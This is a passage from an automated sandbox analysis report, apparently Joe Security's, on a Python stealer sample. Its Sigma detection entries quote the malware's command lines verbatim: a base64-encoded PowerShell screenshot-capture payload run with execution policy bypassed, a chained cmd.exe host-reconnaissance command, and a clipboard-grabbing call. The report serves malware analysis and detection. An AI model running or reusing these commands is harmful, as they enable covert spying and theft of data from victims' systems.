          00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
            Click to see the 17 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
            Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 4208, StartAddress: B28432B0, TargetImage: C:\Windows\System32\wbem\WMIC.exe, TargetProcessId: 4208
            Sigma detected: Suspicious Encoded PowerShell Command Line
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Suspicious PowerShell Encoded Command Patterns
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Console CodePage Lookup Via CHCP
            Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2936, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 1968, ProcessName: chcp.com
            Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe, ParentProcessId: 7112, ParentProcessName: SecuriteInfo.com.FileRepMalware.22561.28030.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 2144, ProcessName: cmd.exe
            Sigma detected: Suspicious Execution of Powershell with Base64
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
            Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 4052, ProcessName: net.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.cmdline
            Sigma detected: Local Accounts Discovery
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4140, ProcessName: net.exe
            Sigma detected: Net.exe Execution
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6468, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4140, ProcessName: net.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 4508, ProcessName: powershell.exe
            Sigma detected: SC.EXE Query Execution
